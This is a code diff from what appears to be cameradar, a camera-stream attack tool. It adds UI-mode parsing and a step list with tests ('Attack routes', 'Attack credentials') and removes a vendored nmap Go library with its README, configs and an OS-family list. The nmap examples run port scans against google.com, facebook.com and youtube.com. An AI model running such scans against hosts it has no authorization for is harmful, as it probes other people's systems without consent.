return "Summary"
|
||||
default:
|
||||
return string(step)
|
||||
}
|
||||
}
|
||||
|
||||
// Steps returns the ordered list of steps.
|
||||
func Steps() []Step {
|
||||
return []Step{
|
||||
StepScan,
|
||||
StepAttackRoutes,
|
||||
StepDetectAuth,
|
||||
StepAttackCredentials,
|
||||
StepValidateStreams,
|
||||
StepSummary,
|
||||
}
|
||||
}
|
||||
|
||||
// ParseMode parses a user-provided UI mode.
|
||||
func ParseMode(value string) (Mode, error) {
|
||||
mode := Mode(strings.ToLower(strings.TrimSpace(value)))
|
||||
switch mode {
|
||||
case ModeAuto, ModeTUI, ModePlain:
|
||||
return mode, nil
|
||||
case "":
|
||||
return ModeAuto, nil
|
||||
default:
|
||||
return ModeAuto, fmt.Errorf("invalid ui mode %q", value)
|
||||
}
|
||||
}
|
||||
+94
@@ -0,0 +1,94 @@
|
||||
package cameradar_test
|
||||
|
||||
import (
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestParseMode(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
input string
|
||||
want cameradar.Mode
|
||||
wantErr require.ErrorAssertionFunc
|
||||
wantErrMessage string
|
||||
}{
|
||||
{
|
||||
name: "auto",
|
||||
input: "auto",
|
||||
want: cameradar.ModeAuto,
|
||||
wantErr: require.NoError,
|
||||
},
|
||||
{
|
||||
name: "tui",
|
||||
input: "TUI",
|
||||
want: cameradar.ModeTUI,
|
||||
wantErr: require.NoError,
|
||||
},
|
||||
{
|
||||
name: "plain",
|
||||
input: "plain",
|
||||
want: cameradar.ModePlain,
|
||||
wantErr: require.NoError,
|
||||
},
|
||||
{
|
||||
name: "empty",
|
||||
input: " ",
|
||||
want: cameradar.ModeAuto,
|
||||
wantErr: require.NoError,
|
||||
},
|
||||
{
|
||||
name: "invalid",
|
||||
input: "nope",
|
||||
want: cameradar.ModeAuto,
|
||||
wantErr: require.Error,
|
||||
wantErrMessage: "invalid ui mode",
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
got, err := cameradar.ParseMode(test.input)
|
||||
test.wantErr(t, err)
|
||||
if test.wantErrMessage != "" {
|
||||
assert.ErrorContains(t, err, test.wantErrMessage)
|
||||
}
|
||||
assert.Equal(t, test.want, got)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestStepLabel(t *testing.T) {
|
||||
tests := []struct {
|
||||
step cameradar.Step
|
||||
want string
|
||||
}{
|
||||
{step: cameradar.StepScan, want: "Scan targets"},
|
||||
{step: cameradar.StepAttackRoutes, want: "Attack routes"},
|
||||
{step: cameradar.StepDetectAuth, want: "Detect authentication"},
|
||||
{step: cameradar.StepAttackCredentials, want: "Attack credentials"},
|
||||
{step: cameradar.StepValidateStreams, want: "Validate streams"},
|
||||
{step: cameradar.StepSummary, want: "Summary"},
|
||||
{step: cameradar.Step("custom"), want: "custom"},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.want, func(t *testing.T) {
|
||||
assert.Equal(t, test.want, cameradar.StepLabel(test.step))
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestSteps(t *testing.T) {
|
||||
assert.Equal(t, []cameradar.Step{
|
||||
cameradar.StepScan,
|
||||
cameradar.StepAttackRoutes,
|
||||
cameradar.StepDetectAuth,
|
||||
cameradar.StepAttackCredentials,
|
||||
cameradar.StepValidateStreams,
|
||||
cameradar.StepSummary,
|
||||
}, cameradar.Steps())
|
||||
}
|
||||
-123
@@ -1,123 +0,0 @@
|
||||
## Golang
|
||||
|
||||
### Binaries for programs and plugins
|
||||
*.exe
|
||||
*.exe~
|
||||
*.dll
|
||||
*.so
|
||||
*.dylib
|
||||
|
||||
### Test binary, built with `go test -c`
|
||||
*.test
|
||||
|
||||
### Output of the go coverage tool, specifically when used with LiteIDE
|
||||
*.out
|
||||
|
||||
## MacOS
|
||||
|
||||
### General
|
||||
.DS_Store
|
||||
.AppleDouble
|
||||
.LSOverride
|
||||
|
||||
### Icon must end with two \r
|
||||
Icon
|
||||
|
||||
|
||||
### Thumbnails
|
||||
._*
|
||||
|
||||
### Files that might appear in the root of a volume
|
||||
.DocumentRevisions-V100
|
||||
.fseventsd
|
||||
.Spotlight-V100
|
||||
.TemporaryItems
|
||||
.Trashes
|
||||
.VolumeIcon.icns
|
||||
.com.apple.timemachine.donotpresent
|
||||
|
||||
### Directories potentially created on remote AFP share
|
||||
.AppleDB
|
||||
.AppleDesktop
|
||||
Network Trash Folder
|
||||
Temporary Items
|
||||
.apdisk
|
||||
|
||||
## IDEs
|
||||
|
||||
### VSCode
|
||||
|
||||
.vscode/*
|
||||
!.vscode/settings.json
|
||||
!.vscode/tasks.json
|
||||
!.vscode/launch.json
|
||||
!.vscode/extensions.json
|
||||
|
||||
### JetBrains
|
||||
|
||||
# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm
|
||||
# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
|
||||
|
||||
# User-specific stuff
|
||||
.idea/**/workspace.xml
|
||||
.idea/**/tasks.xml
|
||||
.idea/**/usage.statistics.xml
|
||||
.idea/**/dictionaries
|
||||
.idea/**/shelf
|
||||
|
||||
# Generated files
|
||||
.idea/**/contentModel.xml
|
||||
|
||||
# Sensitive or high-churn files
|
||||
.idea/**/dataSources/
|
||||
.idea/**/dataSources.ids
|
||||
.idea/**/dataSources.local.xml
|
||||
.idea/**/sqlDataSources.xml
|
||||
.idea/**/dynamic.xml
|
||||
.idea/**/uiDesigner.xml
|
||||
.idea/**/dbnavigator.xml
|
||||
|
||||
# Gradle
|
||||
.idea/**/gradle.xml
|
||||
.idea/**/libraries
|
||||
|
||||
# Gradle and Maven with auto-import
|
||||
# When using Gradle or Maven with auto-import, you should exclude module files,
|
||||
# since they will be recreated, and may cause churn. Uncomment if using
|
||||
# auto-import.
|
||||
# .idea/modules.xml
|
||||
# .idea/*.iml
|
||||
# .idea/modules
|
||||
|
||||
# CMake
|
||||
cmake-build-*/
|
||||
|
||||
# Mongo Explorer plugin
|
||||
.idea/**/mongoSettings.xml
|
||||
|
||||
# File-based project format
|
||||
*.iws
|
||||
|
||||
# IntelliJ
|
||||
out/
|
||||
|
||||
# mpeltonen/sbt-idea plugin
|
||||
.idea_modules/
|
||||
|
||||
# JIRA plugin
|
||||
atlassian-ide-plugin.xml
|
||||
|
||||
# Cursive Clojure plugin
|
||||
.idea/replstate.xml
|
||||
|
||||
# Crashlytics plugin (for Android Studio and IntelliJ)
|
||||
com_crashlytics_export_strings.xml
|
||||
crashlytics.properties
|
||||
crashlytics-build.properties
|
||||
fabric.properties
|
||||
|
||||
# Editor-based Rest Client
|
||||
.idea/httpRequests
|
||||
|
||||
# Android studio 3.1+ serialized cache file
|
||||
.idea/caches/build_file_checksums.ser
|
||||
-159
@@ -1,159 +0,0 @@
|
||||
# This file contains all available configuration options
|
||||
# with their default values.
|
||||
|
||||
# options for analysis running
|
||||
run:
|
||||
# timeout for analysis, e.g. 30s, 5m, default is 1m
|
||||
deadline: 1m
|
||||
|
||||
tests: false
|
||||
|
||||
# which dirs to skip: they won't be analyzed;
|
||||
# can use regexp here: generated.*, regexp is applied on full path;
|
||||
# default value is empty list, but next dirs are always skipped independently
|
||||
# from this option's value:
|
||||
# vendor$, third_party$, testdata$, examples$, Godeps$, builtin$
|
||||
skip-dirs:
|
||||
- pkg/osfamilies
|
||||
|
||||
# output configuration options
|
||||
output:
|
||||
# colored-line-number|line-number|json|tab|checkstyle, default is "colored-line-number"
|
||||
format: colored-line-number
|
||||
|
||||
# print lines of code with issue, default is true
|
||||
print-issued-lines: true
|
||||
|
||||
# print linter name in the end of issue text, default is true
|
||||
print-linter-name: true
|
||||
|
||||
|
||||
# all available settings of specific linters
|
||||
linters-settings:
|
||||
errcheck:
|
||||
# report about not checking of errors in type assetions: `a := b.(MyStruct)`;
|
||||
# default is false: such cases aren't reported by default.
|
||||
check-type-assertions: false
|
||||
|
||||
# report about assignment of errors to blank identifier: `num, _ := strconv.Atoi(numStr)`;
|
||||
# default is false: such cases aren't reported by default.
|
||||
check-blank: false
|
||||
|
||||
# [deprecated] comma-separated list of pairs of the form pkg:regex
|
||||
# the regex is used to ignore names within pkg. (default "fmt:.*").
|
||||
# see https://github.com/kisielk/errcheck#the-deprecated-method for details
|
||||
ignore: fmt:.*,io/ioutil:^Read.*,os/exec:^Kill.*
|
||||
|
||||
govet:
|
||||
# report about shadowed variables
|
||||
check-shadowing: true
|
||||
golint:
|
||||
# minimal confidence for issues, default is 0.8
|
||||
min-confidence: 0.8
|
||||
gofmt:
|
||||
# simplify code: gofmt with `-s` option, true by default
|
||||
simplify: true
|
||||
goimports:
|
||||
# put imports beginning with prefix after 3rd-party packages;
|
||||
# it's a comma-separated list of prefixes
|
||||
local-prefixes: github.com/org/project
|
||||
gocyclo:
|
||||
# minimal code complexity to report, 30 by default (but we recommend 10-20)
|
||||
min-complexity: 10
|
||||
maligned:
|
||||
# print struct with more effective memory layout or not, false by default
|
||||
suggest-new: true
|
||||
dupl:
|
||||
# tokens count to trigger issue, 150 by default
|
||||
threshold: 150
|
||||
goconst:
|
||||
# minimal length of string constant, 3 by default
|
||||
min-len: 3
|
||||
# minimal occurrences count to trigger, 3 by default
|
||||
min-occurrences: 3
|
||||
depguard:
|
||||
list-type: blacklist
|
||||
include-go-root: false
|
||||
packages:
|
||||
- github.com/davecgh/go-spew/spew
|
||||
misspell:
|
||||
# Correct spellings using locale preferences for US or UK.
|
||||
# Default is to use a neutral variety of English.
|
||||
# Setting locale to US will correct the British spelling of 'colour' to 'color'.
|
||||
locale: US
|
||||
lll:
|
||||
# max line length, lines longer will be reported. Default is 120.
|
||||
# '\t' is counted as 1 character by default, and can be changed with the tab-width option
|
||||
line-length: 120
|
||||
# tab width in spaces. Default to 1.
|
||||
tab-width: 1
|
||||
unused:
|
||||
# treat code as a program (not a library) and report unused exported identifiers; default is false.
|
||||
# XXX: if you enable this setting, unused will report a lot of false-positives in text editors:
|
||||
# if it's called for subdir of a project it can't find funcs usages. All text editor integrations
|
||||
# with golangci-lint call it on a directory with the changed file.
|
||||
check-exported: false
|
||||
unparam:
|
||||
# call graph construction algorithm (cha, rta). In general, use cha for libraries,
|
||||
# and rta for programs with main packages. Default is cha.
|
||||
algo: cha
|
||||
|
||||
# Inspect exported functions, default is false. Set to true if no external program/library imports your code.
|
||||
# XXX: if you enable this setting, unparam will report a lot of false-positives in text editors:
|
||||
# if it's called for subdir of a project it can't find external interfaces. All text editor integrations
|
||||
# with golangci-lint call it on a directory with the changed file.
|
||||
check-exported: false
|
||||
nakedret:
|
||||
# make an issue if func has more lines of code than this setting and it has naked returns; default is 30
|
||||
max-func-lines: 30
|
||||
prealloc:
|
||||
# XXX: we don't recommend using this linter before doing performance profiling.
|
||||
# For most programs usage of prealloc will be a premature optimization.
|
||||
|
||||
# Report preallocation suggestions only on simple loops that have no returns/breaks/continues/gotos in them.
|
||||
# True by default.
|
||||
simple: true
|
||||
range-loops: true # Report preallocation suggestions on range loops, true by default
|
||||
for-loops: false # Report preallocation suggestions on for loops, false by default
|
||||
gocritic:
|
||||
# Enable multiple checks by tags, run `GL_DEBUG=gocritic golangci-lint` run to see all tags and checks.
|
||||
# Empty list by default. See https://github.com/go-critic/go-critic#usage -> section "Tags".
|
||||
enabled-tags:
|
||||
- performance
|
||||
|
||||
linters:
|
||||
enable:
|
||||
- megacheck
|
||||
- govet
|
||||
enable-all: false
|
||||
disable:
|
||||
- maligned
|
||||
- prealloc
|
||||
disable-all: false
|
||||
presets:
|
||||
- bugs
|
||||
- unused
|
||||
fast: false
|
||||
|
||||
|
||||
issues:
|
||||
# List of regexps of issue texts to exclude, empty list by default.
|
||||
# But independently from this option we use default exclude patterns,
|
||||
# it can be disabled by `exclude-use-default: false`. To list all
|
||||
# excluded by default patterns execute `golangci-lint run --help`
|
||||
exclude:
|
||||
- "Subprocess launching should be audited"
|
||||
|
||||
# Maximum issues count per one linter. Set to 0 to disable. Default is 50.
|
||||
max-per-linter: 0
|
||||
|
||||
# Maximum count of issues with the same text. Set to 0 to disable. Default is 3.
|
||||
max-same-issues: 0
|
||||
|
||||
# Show only new issues: if there are unstaged changes or untracked files,
|
||||
# only those changes are analyzed, else only changes in HEAD~ are analyzed.
|
||||
# It's a super-useful option for integration of golangci-lint into existing
|
||||
# large codebase. It's not practical to fix all existing issues at the moment
|
||||
# of integration: much better don't allow issues in new code.
|
||||
# Default is false.
|
||||
new: false
|
||||
-20
@@ -1,20 +0,0 @@
|
||||
dist: trusty
|
||||
sudo: required
|
||||
language: go
|
||||
|
||||
before_install:
|
||||
- sudo apt-get install -y nmap
|
||||
- go get github.com/mattn/goveralls
|
||||
|
||||
script:
|
||||
# Run unit tests
|
||||
- go test -v -covermode=count -coverprofile=coverage.out
|
||||
- $HOME/gopath/bin/goveralls -coverprofile=coverage.out -service=travis-ci -repotoken=$COVERALLS_TOKEN
|
||||
# Ensure the examples compile
|
||||
- for dir in examples/*/; do go build -o $dir/bin $dir/main.go; done
|
||||
notifications:
|
||||
email:
|
||||
recipients:
|
||||
- brendan.le-glaunec@epitech.eu
|
||||
on_success: never
|
||||
on_failure: always
|
||||
-21
@@ -1,21 +0,0 @@
|
||||
MIT License
|
||||
|
||||
Copyright (c) 2019 Ullaakut
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in all
|
||||
copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||
SOFTWARE.
|
||||
-114
@@ -1,114 +0,0 @@
|
||||
# nmap
|
||||
|
||||
<p align="center">
|
||||
<img width="350" src="img/logo.png"/>
|
||||
<p>
|
||||
|
||||
<p align="center">
|
||||
<a href="LICENSE">
|
||||
<img src="https://img.shields.io/badge/license-MIT-blue.svg?style=flat" />
|
||||
</a>
|
||||
<a href="https://godoc.org/github.com/Ullaakut/nmap">
|
||||
<img src="https://godoc.org/github.com/Ullaakut/cameradar?status.svg" />
|
||||
</a>
|
||||
<a href="https://goreportcard.com/report/github.com/ullaakut/nmap">
|
||||
<img src="https://goreportcard.com/badge/github.com/ullaakut/nmap">
|
||||
</a>
|
||||
<a href="https://travis-ci.org/Ullaakut/nmap">
|
||||
<img src="https://travis-ci.org/Ullaakut/nmap.svg?branch=master">
|
||||
</a>
|
||||
<a href="https://coveralls.io/github/Ullaakut/nmap?branch=master">
|
||||
<img src="https://coveralls.io/repos/github/Ullaakut/nmap/badge.svg?branch=master">
|
||||
</a>
|
||||
<p>
|
||||
|
||||
This library aims at providing idiomatic `nmap` bindings for go developers, in order to make it easier to write security audit tools using golang.
|
||||
|
||||
<!-- It allows not only to parse the XML output of nmap, but also to get the output of nmap as it is running, through a channel. This can be useful for computing a scan's progress, or simply displaying live information to your users. -->
|
||||
|
||||
## It's currently a work in progress
|
||||
|
||||
This paragraph won't be removed until the library is ready to be used and properly documented.
|
||||
|
||||
## Supported features
|
||||
|
||||
- [x] All of `nmap`'s options as `WithXXX` methods.
|
||||
- [x] Cancellable contexts support.
|
||||
- [x] [Idiomatic go filters](examples/service_detection/main.go#L19).
|
||||
- [x] Helpful enums for most nmap commands. (time templates, os families, port states, etc.)
|
||||
- [x] Complete documentation of each option, mostly insipred from nmap's documentation.
|
||||
|
||||
## TODO
|
||||
|
||||
- [ ] Examples of usage - Work in progress (4/7 examples so far)
|
||||
- [ ] Complete unit tests - Work in progress (95% coverage so far)
|
||||
- [ ] Asynchronous scan
|
||||
|
||||
## Example
|
||||
|
||||
```go
|
||||
package main
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"log"
|
||||
"time"
|
||||
|
||||
"github.com/Ullaakut/nmap"
|
||||
)
|
||||
|
||||
func main() {
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Minute)
|
||||
defer cancel()
|
||||
|
||||
// Equivalent to `/usr/local/bin/nmap -p 80,443,843 google.com facebook.com youtube.com`,
|
||||
// with a 5 minute timeout.
|
||||
scanner, err := nmap.NewScanner(
|
||||
nmap.WithTargets("google.com", "facebook.com", "youtube.com"),
|
||||
nmap.WithPorts("80,443,843"),
|
||||
nmap.WithContext(ctx),
|
||||
)
|
||||
if err != nil {
|
||||
log.Fatalf("unable to create nmap scanner: %v", err)
|
||||
}
|
||||
|
||||
result, err := scanner.Run()
|
||||
if err != nil {
|
||||
log.Fatalf("unable to run nmap scan: %v", err)
|
||||
}
|
||||
|
||||
// Use the results to print an example output
|
||||
for _, host := range result.Hosts {
|
||||
if len(host.Ports) == 0 || len(host.Addresses) == 0 {
|
||||
continue
|
||||
}
|
||||
|
||||
fmt.Printf("Host %q:\n", host.Addresses[0])
|
||||
|
||||
for _, port := range host.Ports {
|
||||
fmt.Printf("\tPort %d/%s %s %s\n", port.ID, port.Protocol, port.State, port.Service.Name)
|
||||
}
|
||||
}
|
||||
|
||||
fmt.Printf("Nmap done: %d hosts up scanned in %3f seconds\n", len(result.Hosts), result.Stats.Finished.Elapsed)
|
||||
}
|
||||
```
|
||||
|
||||
The program above outputs:
|
||||
|
||||
```bash
|
||||
Host "172.217.16.46":
|
||||
Port 80/tcp open http
|
||||
Port 443/tcp open https
|
||||
Port 843/tcp filtered unknown
|
||||
Host "31.13.81.36":
|
||||
Port 80/tcp open http
|
||||
Port 443/tcp open https
|
||||
Port 843/tcp open unknown
|
||||
Host "216.58.215.110":
|
||||
Port 80/tcp open http
|
||||
Port 443/tcp open https
|
||||
Port 843/tcp filtered unknown
|
||||
Nmap done: 3 hosts up scanned in 1.29 seconds
|
||||
```
|
||||
-18
@@ -1,18 +0,0 @@
|
||||
package nmap
|
||||
|
||||
import (
|
||||
"errors"
|
||||
)
|
||||
|
||||
var (
|
||||
// ErrNmapNotInstalled means that upon trying to manually locate nmap in the user's path,
|
||||
// it was not found. Either use the WithBinaryPath method to set it manually, or make sure that
|
||||
// the nmap binary is present in the user's $PATH.
|
||||
ErrNmapNotInstalled = errors.New("'nmap' binary was not found")
|
||||
|
||||
// ErrScanTimeout means that the provided context was done before the scanner finished its scan.
|
||||
ErrScanTimeout = errors.New("nmap scan timed out")
|
||||
|
||||
// ErrNoTargetsSpecified means that no targets were specified.
|
||||
ErrNoTargetsSpecified = errors.New("no targets specified")
|
||||
)
|
||||
-64
@@ -1,64 +0,0 @@
|
||||
package nmap
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"log"
|
||||
)
|
||||
|
||||
// A scanner can be instanciated with options to set the arguments
|
||||
// that are given to nmap.
|
||||
func ExampleScanner_simple() {
|
||||
s, err := NewScanner(
|
||||
WithTargets("google.com", "facebook.com", "youtube.com"),
|
||||
WithCustomDNSServers("8.8.8.8", "8.8.4.4"),
|
||||
WithTimingTemplate(TimingFastest),
|
||||
WithTCPScanFlags(FlagACK, FlagNULL, FlagRST),
|
||||
)
|
||||
if err != nil {
|
||||
log.Fatalf("unable to create nmap scanner: %v", err)
|
||||
}
|
||||
|
||||
scanResult, err := s.Run()
|
||||
if err != nil {
|
||||
log.Fatalf("nmap encountered an error: %v", err)
|
||||
}
|
||||
|
||||
fmt.Printf(
|
||||
"Scan successful: %d hosts up\n",
|
||||
scanResult.Stats.Hosts.Up,
|
||||
)
|
||||
// Output: Scan successful: 3 hosts up
|
||||
}
|
||||
|
||||
// A scanner can be given custom idiomatic filters for both hosts
|
||||
// and ports.
|
||||
func ExampleScanner_filters() {
|
||||
s, err := NewScanner(
|
||||
WithTargets("google.com", "facebook.com"),
|
||||
WithPorts("843"),
|
||||
WithFilterHost(func(h Host) bool {
|
||||
// Filter out hosts with no open ports.
|
||||
for idx := range h.Ports {
|
||||
if h.Ports[idx].Status() == "open" {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}),
|
||||
)
|
||||
if err != nil {
|
||||
log.Fatalf("unable to create nmap scanner: %v", err)
|
||||
}
|
||||
|
||||
scanResult, err := s.Run()
|
||||
if err != nil {
|
||||
log.Fatalf("nmap encountered an error: %v", err)
|
||||
}
|
||||
|
||||
fmt.Printf(
|
||||
"Filtered out hosts %d / Original number of hosts: %d\n",
|
||||
len(scanResult.Hosts),
|
||||
scanResult.Stats.Hosts.Total,
|
||||
)
|
||||
// Output: Filtered out hosts 1 / Original number of hosts: 2
|
||||
}
|
||||
-1216
File diff suppressed because it is too large
Load Diff
-1781
File diff suppressed because it is too large
Load Diff
-644
@@ -1,644 +0,0 @@
|
||||
package osfamilies
|
||||
|
||||
// OSFamily describes an OS Family, usually from a constructor or
|
||||
// a kernel.
|
||||
type OSFamily string
|
||||
|
||||
// OSFamily definitions.
|
||||
const (
|
||||
TwoN OSFamily = "2N"
|
||||
TwoWire OSFamily = "2Wire"
|
||||
ThreeCom OSFamily = "3Com"
|
||||
ThreeM OSFamily = "3M"
|
||||
FourG OSFamily = "4G"
|
||||
ATec OSFamily = "A-Tec"
|
||||
ADIC OSFamily = "ADIC"
|
||||
AKCP OSFamily = "AKCP"
|
||||
AMX OSFamily = "AMX"
|
||||
APC OSFamily = "APC"
|
||||
ARCA OSFamily = "ARCA"
|
||||
ATandT OSFamily = "AT&T"
|
||||
AVM OSFamily = "AVM"
|
||||
AVtech OSFamily = "AVtech"
|
||||
AXIS OSFamily = "AXIS"
|
||||
Aastra OSFamily = "Aastra"
|
||||
AcBel OSFamily = "AcBel"
|
||||
Aceex OSFamily = "Aceex"
|
||||
Acer OSFamily = "Acer"
|
||||
Acme OSFamily = "Acme"
|
||||
Acorp OSFamily = "Acorp"
|
||||
Actiontec OSFamily = "Actiontec"
|
||||
Adaptec OSFamily = "Adaptec"
|
||||
Adtran OSFamily = "Adtran"
|
||||
Adva OSFamily = "Adva"
|
||||
Advanced OSFamily = "Advanced"
|
||||
Aerohive OSFamily = "Aerohive"
|
||||
Aethra OSFamily = "Aethra"
|
||||
Agfa OSFamily = "Agfa"
|
||||
AirLive OSFamily = "AirLive"
|
||||
AirMagnet OSFamily = "AirMagnet"
|
||||
AirSpan OSFamily = "AirSpan"
|
||||
Airaya OSFamily = "Airaya"
|
||||
Airlink101 OSFamily = "Airlink101"
|
||||
Airnet OSFamily = "Airnet"
|
||||
Airvana OSFamily = "Airvana"
|
||||
Alaxala OSFamily = "Alaxala"
|
||||
Alcatel OSFamily = "Alcatel"
|
||||
AlcatelLucent OSFamily = "Alcatel-Lucent"
|
||||
Alice OSFamily = "Alice"
|
||||
AllenBradley OSFamily = "Allen-Bradley"
|
||||
Allied OSFamily = "Allied"
|
||||
Allnet OSFamily = "Allnet"
|
||||
Allworx OSFamily = "Allworx"
|
||||
Alvarion OSFamily = "Alvarion"
|
||||
Amazon OSFamily = "Amazon"
|
||||
Ambit OSFamily = "Ambit"
|
||||
Amiga OSFamily = "Amiga"
|
||||
Anue OSFamily = "Anue"
|
||||
Apple OSFamily = "Apple"
|
||||
Arcor OSFamily = "Arcor"
|
||||
Areca OSFamily = "Areca"
|
||||
Argon OSFamily = "Argon"
|
||||
Argosy OSFamily = "Argosy"
|
||||
Arris OSFamily = "Arris"
|
||||
Aruba OSFamily = "Aruba"
|
||||
Asmax OSFamily = "Asmax"
|
||||
Asus OSFamily = "Asus"
|
||||
Atari OSFamily = "Atari"
|
||||
Atcom OSFamily = "Atcom"
|
||||
AudioCodes OSFamily = "AudioCodes"
|
||||
AudioControl OSFamily = "AudioControl"
|
||||
Avaya OSFamily = "Avaya"
|
||||
Avocent OSFamily = "Avocent"
|
||||
Axcient OSFamily = "Axcient"
|
||||
AzBox OSFamily = "AzBox"
|
||||
BECK OSFamily = "BECK"
|
||||
BSD OSFamily = "BSD"
|
||||
BSDI OSFamily = "BSDI"
|
||||
BT OSFamily = "BT"
|
||||
Barracuda OSFamily = "Barracuda"
|
||||
Barrelfish OSFamily = "Barrelfish"
|
||||
Basler OSFamily = "Basler"
|
||||
Bay OSFamily = "Bay"
|
||||
BeaconMedaes OSFamily = "BeaconMedaes"
|
||||
Beat OSFamily = "Beat"
|
||||
Belkin OSFamily = "Belkin"
|
||||
Bell OSFamily = "Bell"
|
||||
Billion OSFamily = "Billion"
|
||||
BinTec OSFamily = "BinTec"
|
||||
BlackBox OSFamily = "BlackBox"
|
||||
Blackboard OSFamily = "Blackboard"
|
||||
Blue OSFamily = "Blue"
|
||||
BlueArc OSFamily = "BlueArc"
|
||||
Bluebird OSFamily = "Bluebird"
|
||||
Bomara OSFamily = "Bomara"
|
||||
Bosch OSFamily = "Bosch"
|
||||
Bose OSFamily = "Bose"
|
||||
Boundless OSFamily = "Boundless"
|
||||
Bowers OSFamily = "Bowers"
|
||||
British OSFamily = "British"
|
||||
BroadMax OSFamily = "BroadMax"
|
||||
Brocade OSFamily = "Brocade"
|
||||
Brother OSFamily = "Brother"
|
||||
Buffalo OSFamily = "Buffalo"
|
||||
Burny OSFamily = "Burny"
|
||||
Bush OSFamily = "Bush"
|
||||
CNav OSFamily = "C-Nav"
|
||||
CAEN OSFamily = "CAEN"
|
||||
CMI OSFamily = "CMI"
|
||||
Cabletron OSFamily = "Cabletron"
|
||||
Caldera OSFamily = "Caldera"
|
||||
Calix OSFamily = "Calix"
|
||||
Cameo OSFamily = "Cameo"
|
||||
Canon OSFamily = "Canon"
|
||||
Casio OSFamily = "Casio"
|
||||
Cayman OSFamily = "Cayman"
|
||||
Ceedtec OSFamily = "Ceedtec"
|
||||
Check OSFamily = "Check"
|
||||
Chip OSFamily = "Chip"
|
||||
CipherLab OSFamily = "CipherLab"
|
||||
Cisco OSFamily = "Cisco"
|
||||
Citrix OSFamily = "Citrix"
|
||||
CoRAID OSFamily = "CoRAID"
|
||||
Cobalt OSFamily = "Cobalt"
|
||||
Cognex OSFamily = "Cognex"
|
||||
Comau OSFamily = "Comau"
|
||||
Compal OSFamily = "Compal"
|
||||
Compaq OSFamily = "Compaq"
|
||||
Comtrend OSFamily = "Comtrend"
|
||||
Conceptronic OSFamily = "Conceptronic"
|
||||
Control4 OSFamily = "Control4"
|
||||
Coyote OSFamily = "Coyote"
|
||||
Cray OSFamily = "Cray"
|
||||
Crestron OSFamily = "Crestron"
|
||||
CyanogenMod OSFamily = "CyanogenMod"
|
||||
Cyberoam OSFamily = "Cyberoam"
|
||||
Cymphonix OSFamily = "Cymphonix"
|
||||
DLink OSFamily = "D-Link"
|
||||
DEC OSFamily = "DEC"
|
||||
DMP OSFamily = "DMP"
|
||||
DTE OSFamily = "DTE"
|
||||
DVTel OSFamily = "DVTel"
|
||||
DYMO OSFamily = "DYMO"
|
||||
Data OSFamily = "Data"
|
||||
Datalogic OSFamily = "Datalogic"
|
||||
Daysequerra OSFamily = "Daysequerra"
|
||||
Decru OSFamily = "Decru"
|
||||
Dedicated OSFamily = "Dedicated"
|
||||
Dell OSFamily = "Dell"
|
||||
Denon OSFamily = "Denon"
|
||||
Denver OSFamily = "Denver"
|
||||
Develop OSFamily = "Develop"
|
||||
Dick OSFamily = "Dick"
|
||||
Digi OSFamily = "Digi"
|
||||
Digital OSFamily = "Digital"
|
||||
Digitus OSFamily = "Digitus"
|
||||
Digium OSFamily = "Digium"
|
||||
DirecTV OSFamily = "DirecTV"
|
||||
Dish OSFamily = "Dish"
|
||||
Dolby OSFamily = "Dolby"
|
||||
DragonFly OSFamily = "DragonFly"
|
||||
DragonWave OSFamily = "DragonWave"
|
||||
DrayTek OSFamily = "DrayTek"
|
||||
Draytek OSFamily = "Draytek"
|
||||
Drayton OSFamily = "Drayton"
|
||||
Dream OSFamily = "Dream"
|
||||
Drobo OSFamily = "Drobo"
|
||||
EMC OSFamily = "EMC"
|
||||
ESI OSFamily = "ESI"
|
||||
ETH OSFamily = "ETH"
|
||||
EasyPath OSFamily = "EasyPath"
|
||||
Eaton OSFamily = "Eaton"
|
||||
Efficient OSFamily = "Efficient"
|
||||
Eicon OSFamily = "Eicon"
|
||||
Elfiq OSFamily = "Elfiq"
|
||||
Elk OSFamily = "Elk"
|
||||
Elsag OSFamily = "Elsag"
|
||||
Ember OSFamily = "Ember"
|
||||
Emerson OSFamily = "Emerson"
|
||||
EnGenius OSFamily = "EnGenius"
|
||||
Encore OSFamily = "Encore"
|
||||
Endian OSFamily = "Endian"
|
||||
Enerdis OSFamily = "Enerdis"
|
||||
Engetron OSFamily = "Engetron"
|
||||
Enistic OSFamily = "Enistic"
|
||||
Enlogic OSFamily = "Enlogic"
|
||||
Enterasys OSFamily = "Enterasys"
|
||||
Epson OSFamily = "Epson"
|
||||
Ericsson OSFamily = "Ericsson"
|
||||
Espressif OSFamily = "Espressif"
|
||||
Essentia OSFamily = "Essentia"
|
||||
